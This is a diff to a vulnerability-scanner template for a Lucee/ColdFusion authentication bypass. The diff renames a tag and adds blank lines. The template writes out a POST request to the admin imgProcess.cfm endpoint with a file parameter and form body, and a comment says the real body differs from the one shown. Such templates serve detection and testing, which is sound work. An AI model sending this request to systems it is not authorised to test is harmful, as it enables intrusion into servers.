--- a/vulnerabilities/other/coldfusion-lucee-auth-bypass.yaml
+++ b/vulnerabilities/other/coldfusion-lucee-auth-bypass.yaml
@@ -4,16 +4,18 @@ info:
   name: Adobe ColdFusion Lucee Auth Bypass
   author: dhiyaneshDK
   severity: high
-  tags: adobe,auth
+  tags: adobe,auth-bypass
   reference: https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
 requests:
   - method: POST
     path:
       - '{{BaseURL}}/lucee/admin/imgProcess.cfm?file=filename.cfm'
+
     headers:
       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
       Content-Type: application/x-www-form-urlencoded
     body: 'imgSrcsss="#stText.Buttons.save#"' # NOTE real body is: imgSrc=sample
+
     matchers:
       - type: word
         part: body
